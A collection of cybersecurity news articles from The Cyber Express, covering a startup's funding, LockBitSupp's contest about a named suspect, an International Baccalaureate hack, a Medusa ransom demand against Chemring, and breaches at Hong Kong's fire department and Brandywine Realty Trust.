Since its inception, Treacle has achieved significant milestones. The firm secured grants such as the C3iHub Grant and the SISFS Grant, in 2021 and 2022, respectively. Additionally, Treacle represented India under DPIIT and participated in a sponsored delegation trip to Dubai in 2022. They also won a significant grant from the Department of Telecommunications, Government of India in DCIS 2023, and were named the Best Student Led Startup in the AWS Campus Fund Grand Challenge 2023. Treacle's journey began in June 2021, following the selection of its pioneering product idea for investment. The innovative approach towards developing a Deception Technology solution caught the attention of C3iHub, leading to the securement of early funding. The seeming dedication and hard work behind the team also resulted in securing the prestigious SISFS grant from the Government of India. Since July 2021, Treacle has been part of the esteemed IHub Programme, incubated at SIIC, IIT Kanpur, which has further strengthened their commitment to developing cybersecurity solutions that stand the test of time. The pre-seed funding round, which marks a significant milestone for the startup, is expected to propel Treacle's growth trajectory. The company's founders are confident that this influx of capital will enable them to accelerate their innovation pipeline, build a stronger team, and ultimately drive greater value for their customers. The startup's vision is to empower organizations with advanced cybersecurity solutions that provide real-time protection against emerging threats. With this vision in mind, Treacle is poised to make a significant impact in the cybersecurity landscape, and this latest funding round is a testament to the company's potential for growth and success. "Securing this funding allows us to accelerate our roadmap and bring our next-generation cybersecurity solutions to a wider audience," said Subhasis Mukhopadhyay, CEO of Treacle. "We are grateful for the support from our investors and are eager to continue our journey in making the digital world safer for everyone." Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In an unexpected turn of events, LockBitSupp, the administrator of the notorious LockBit ransomware group, responded publicly to the Federal Bureau of Investigation (FBI) and international law enforcement's efforts to identify and apprehend him. After bringing back previously seized domains, law enforcement identified Dmitry Yuryevich Khoroshev as the mastermind behind the LockBit operations in an earlier public announcement. This was followed by official sanctions issued by the U.S., U.K., and Australia, accompanied by 26 criminal charges ranging from extortion to hacking, collectively carrying a potential maximum sentence of 185 years imprisonment. The Justice Department has also offered a staggering $10 million reward for information leading to Khoroshev's capture. However, LockBitSupp denied the allegations and attempted to turn the situation into a peculiar contest on the group's remaining leak site.

LockBitSupp Opens Contest to Seek Contact with Individual

The Lockbit admin made a post within the group's leak site about a new contest (contest.omg) in order to encourage individuals to attempt to contact Dmitry Yuryevich Khoroshev. The announcement asserts that the FBI is wrong in its assessment and that the named individual is not LockBitSupp. The announcement seems to try and attribute the alleged identification mistake as a result of an unfortunate cryptocurrency mixing with the ransomware admin's own cryptocurrency funds, which they claim must have attracted the attention of the FBI. Cryptocurrency mixing is activity done to blend different streams of potentially identifiable cryptocurrency to provide further anonymity of transactions. The contest, brazenly invites participants to reach out to the individual believed to be Dmitry Yuryevich Khoroshev and report back on his wellbeing for $1000. The ransomware admin then claimed that the first person to provide evidence such as videos, photos, or screenshots confirming contact with the the "poor guy," as LockBitSupp refers to him, would receive the reward. [caption id="attachment_67621" align="alignnone" width="1055"] Source: X.com (@RedHatPentester)[/caption] Participants were instructed to send their findings through the encrypted messaging platform Tox, using a specific Tox ID provided by LockBitSupp.

LockBitSupp Shares Details of Named Individual

In addition to the contest details, LockBitSupp shared multiple links to LockBit-associated file-sharing services on the dark web, presumably for individuals to archive gathered details and submit as contest entries. They also listed extensive personal details alleged to belong to Dmitry Khoroshev, including email addresses, a Bitcoin wallet address,  passport and tax identification numbers Amid the defiance and contest announcement, LockBitSupp expressed concern for the well-being of the person they claim has been mistakenly identified as them, urging Dmitry Yuryevich Khoroshev, if alive and aware of the announcement, to make contact. This unusual move by LockBitSupp attempts to challenge the statement made by law enforcement agencies and underscores the complex dynamics of the cyber underworld, where hackers taunt their pursuers openly. LockBitSupp emphasized that the contest will remain relevant as long as the announcement is visible on the blog. The admin hinted that there may be similar contests in the future with more substantial rewards, urging followers to stay tuned for updates. The announcement was uploaded and last updated on May 9, 2024, UTC, leaving the public and the cybersecurity community watching closely for further developments. In a recent indictment Khoroshev was identified to behind LockBit's operations and functioned as the group's administrator since September 2019. Khoroshev and the LockBit group was stated to have extorted at least $500 million from victims in 120 countries across the world. Khoroshev was stated to have received around $100m from his part in this activity. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The International Baccalaureate Organization (IBO) confirmed a hacking incident, while clarifying that no ongoing exam papers were leaked despite claims online of a wider cheating scandal. The IB found students sharing exam details online before the completion of their ongoing tests globally, and simultaneously observed increased malicious activity targeting its computer networks. On investigating the online claims, IB found that the leaked data set appeared to be limited to earlier data from 2018, while the ongoing exam paper leaks could be a result of some students sharing exam papers online rather than a hack. Founded in 1968, the International Baccalaureate is a non-profit educational organization based in Geneva, Switzerland. It aims to provide high quality international education free of regional, political or educational agendas.

Exam Cheating Concerns Amidst International Baccalaureate Hack

Earlier last week, the International Baccalaureate had released an update stating that it was investigating online speculation about potential cheating by some students in the ongoing exams. The organization stated that while there was no evidence of widespread cheating, some students might have engaged in "time zone cheating". The organization defined time zone cheating as an action where students "who have completed their examinations share what they can recall from memory about the exam questions on social media before other students take the examination." Citing its own academic integrity policy which forbids such behaviour, the organization stated that students engaging in such activity would not receive their Diploma certificates or grades and may potentially be banned from future exam retests. [caption id="attachment_67556" align="alignnone" width="2800"] Source: Official Update[/caption] After its initial investigations, the organization stated that it had experienced an increase in attempted malicious activity aiming to interfere with its systems. It also confirmed that some data from 2018, including employee names, positions, and emails, had been breached through a third-party vendor, and screenshots of this leaked data were shared online. However, the organization again clarified that at the time of the investigation, no recent exam material was found to be compromised. The notice further stated that IB was continuing to assess the incident and had taken steps to contain the incident. The organization mentioned that it would provide further information on the incident as the situation evolved. The Cyber Express team has reached out to the International Baccalaureate for further details, and a spokesman responded with a link to the second update notification.

Students Petition For Exam Cancellation

The exam is taken by nearly 180,000 students internationally. However, recent speculations over the hacking incident and cheating allegations have raised concerns among students and their parents, leading to an online petition demanding exam cancellation or re-test. Amidst the speculation, the International Baccalaureate took action to remove leaked content and stated that cheaters would face severe consequences. Some condemned the leaks as failures in governance and urged for improved exam security, prompting the IB to affirm its intention to stay ahead of technological threats while promoting academic integrity in the exam process. The IB further cautioned its authorized network of schools about data breaches and phishing attempts. The leaked materials from the International Baccalaureate data breach were observed to have been downloaded over 45,000 times. The leaked content, allegedly included mathematics and physics papers which were widely circulated online, further raising doubts about exam integrity. It remains to be seen, if the student petition demand's for justice or the organization's observation of increased hacking attempts will lead to a further escalation of the situation. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Medusa ransomware group has demanded $3.5 million from the Chemring Group on their leak site, along with a looming threat to leak 186.78 GB of sensitive documents claimed to have been obtained from the Chemring Group data breach. The group set the negotiation deadline as May 16, 2024, providing the victim about 9 days to surrender to demands while also presenting additional options such as prolonging negotiation period, removing or downloading the data allegedly stolen during the attack at varying prices. The Chemring Group is a multi-national UK-based business that provides a range of technology solutions and services to the aerospace, defence and security markets around the world. The Chemring Group data breach post was shared on the threat actor's data leak site along with 3 American organizations listed as victims. However, the authenticity of these claims is yet to be verified. While the Chemring Group refutes any major compromise, they have confirmed an ongoing investigation into the alleged data breach.

Medusa Hackers Demand $3.5 Million Following Chemring Group Data Breach

On the leak site, the ransomware group demanded a ransom of 3.5 million USD with a negotiation deadline of 16th May 2024. The group allegedly exfiltrated 186.78 GB of confidential documents, databases, and SolidWorks design files. However no sample data had been shared making it harder to verify the group's claims. Additionally, the leak site provided the victim with the options to add an additional day to make ransom negotiations for 1 million, to delete all the data for 3.5 million or download/delete the exfiltrated data for 3.5 million. [caption id="attachment_67453" align="alignnone" width="944"] Source: X.com / @H4ckManac[/caption] The Chemring Group PLC listing was also accompanied by the listing of three alleged victim organizations, including One Toyota of Oakland, Merritt Properties and Autobell Car Wash. After being reached out for additional details by The Cyber Express team, a Chemring Group spokesman made the following statements about the alleged ransomware attack:

Chemring has been made aware of a post that has appeared on X (formerly Twitter) alleging that the Group has been subject to a ransomware attack. An investigation has been launched, however there is currently nothing to indicate any compromise of the Group’s IT systems, nor have we received any communication from a threat actor suggesting that we have been breached. We confirm that all Chemring businesses are operating normally. Our preliminary investigations lead us to believe that this attack was on a business previously owned by Chemring but where there is no ongoing relationship or connection into our IT systems. As this is subject to an ongoing criminal investigation we cannot comment further at this stage.

Who is Medusa Ransomware Group?

The MedusaLocker ransomware group has known to have been active since September 2019. The group  usually gains initial access to victims’ networks by exploiting known vulnerabilities in Remote Desktop Protocol (RDP). The Medusa ransomware group has been observed to increase their attack campaigns after the debut of a their dedicated data leak site in February 2023. The group primarily targets healthcare, education and public-sector organizations inits campaigns. The group was previously responsible for an attack on Toyota in December 2023 in which the group obtained access to sensitive details such as names, addresses, contact information, lease-purchase details, and IBAN numbers. The incident prompted the company to adopt stronger data protection and notify affected customers while informing details about the breach to relevant authorities. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Hong Kong fire department uncovered a recent breach in its computer system that exposed the personal information of over 5,000 department personnel and hundreds of residents. The Hong Kong Fire Department data breach, the third incident involving government data in less than a week, stems from an unauthorized change in privileged access rights during a data migration procedure by an outsourced contractor, according to a statement from the Fire Services Department (FSD). The Hong Kong Fire Services Department is an emergency firefighting government service that conducts rescue operations on land and sea. The department is also responsible for providing emergency ambulance service for sick and injured as well in providing fire protection advice to the general public. However, there is no evidence that the leaked data from the Hong Kong Fire Department data breach had been published online.

Systems Suspended Following Hong Kong Fire Department Data Breach

[caption id="attachment_67236" align="alignnone" width="1000"] Source: Shutterstock[/caption] Following the discovery of the intrusion, the fire department suspended the affected system and launched an investigation along with the third-party contractor. The department immediately revoked the contractor's access rights to prevent further data leakage and implemented enhanced security measures to prevent similar incidents. The compromised data included the last names and phone numbers of approximately 480 individuals who reported tree collapse incidents during the Super Typhoon Saola in September 2023. Additionally, personal details such as names, phone numbers, and ranks of around 5,000 FSD staff were at risk, with 960 personnel having their incomplete identity card numbers exposed in the breach. Details regarding the breach were notified to the relevant authorities including the Police, Security Bureau, Privacy Commissioner for Personal Data, and Government Chief Information Officer. "The FSD believes that the incident happened when the outsourced contractor handled the data migration procedure. During the process, the access right of the data was found altered without authorisation, posing a potential risk of data leakage," a Fire Services Department spokesperson stated. The Hong Kong Fire Services Department apologised for the incident and notified those affected through text messages or phone calls. However the department assured the public that there was no evidence that the data had been leaked as of yet.

Data Breach Follows Two Cyber-Incidents within the Same Week

This Hong Kong Fire Department data breach follows similar data breach incidents involving the Electrical and Mechanical Services Department (EMSD) and the Companies Registry last week, where data stored on their servers had been compromised. Lawmaker Elizabeth Quat who heads the Panel on Information Technology and Broadcasting has called for improved data security measures and a punishment mechanism for future incidents and similar blunders. The Electrical and Mechanical Services Department (EMSD) system glitch last Tuesday allowed for unauthorized access to the names, telephone numbers, identity card numbers and addresses of around 17,000 individuals through the server platform without requiring a password. The Companies Registry stated last Friday that security flaws in its online e-Services Portal developed by a third-party contractor resulted in the transmission of additional personal data beyond what was requested by the client computer during searches. While this additional data was not displayed directly, it could be obtained through the use of web developer tools. The additional data was estimated to affect about 110,000 data subjects and included their names, full passport numbers, identity card numbers, residential addresses, telephone numbers and email addresses. The city's privacy watchdog reported a significant increase in data breach notifications last year, signaling a growing concern for data protection. In a recent case involving Cyberport, a government-owned tech hub, the watchdog identified lapses in security audits and unnecessary retention of personal data, highlighting the need for better oversight in handling sensitive information. The string of government-related data breaches highlights the possibility of security weaknesses introduced through dependence on external third-party contractors. This weakness remains a major problem globally as observed in the recent incident UK Ministry of Defense data breach stemming from an external payroll provider. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Brandywine Realty Trust issued a recent filing to the US Securities And Exchange Commission (SEC), where it confirmed that an unauthorized third-party had gained access to portions of its internal network. The Brandywine Realty Trust data breach is stated to have affected the functioning of some of its internal systems, following preventative measures as part of the firm's incident response plan. Brandywine Realty Trust is one of the largest publicly traded real estate companies in the United States with a primary focus in the Philadelphia, Texas and Austin markets. The firm is organized as a real estate investment trust and manages 69 properties comprising of 12.7 million square feet in land spanning multiple states. Upon detecting the intrusion, the trust initiated its response protocols and took steps to contain affected systems, assess the extent of the attack and move towards remediation. Investigative efforts were held together with external cybersecurity professionals, while details were shared with law enforcement.

Brandywine Realty Trust Data Breach Disrupted Trust's Operations

The filing reveals that along with unauthorized access to its internal systems, the attack also involved the  encryption of some of the company's internal resources. The encryption process disrupted access to portions of the company’s business applications responsible for several of the company's internal and corporate functions, including its financial and reporting systems. The company disclosed that certain files were stolen during the attack, but that it is still working on determining the extent of sensitive and confidential information accessed during the intrusion into its IT systems, and establishing if any personal information had been accessed. However, the company believes that the intrusion had been been contained from spreading further into its systems and stated that it is working diligently to restore its IT systems back online. The Company is also  evaluating if any additional regulatory and legal notifications are required after facing the incident and will issue appropriate notifications according to its findings.

Perpetrator Behind Brandywine Realty Trust Data Breach Unknown

The company is known to have rented out commercial properties to various prominent firms, with its biggest tenants including IBM, Spark Therapeutics, Comcast, and the FMC Corporation. However, the attack comes during a recent period of increased ongoing volatility in the office commercial space with  Brandywine recently cutting down its quarterly dividend, from 19 cents to 15 cents a share, for the first time since 2009. In an recent interview, the company's CEO acknowledged “turbulent times” in commercial real estate space and the company aimed at covering its “danger points.” He added the company has plenty of cash and available credit, while noting that compared to its peers, the firm had a substantially lower number of leases set to expire over the next few years.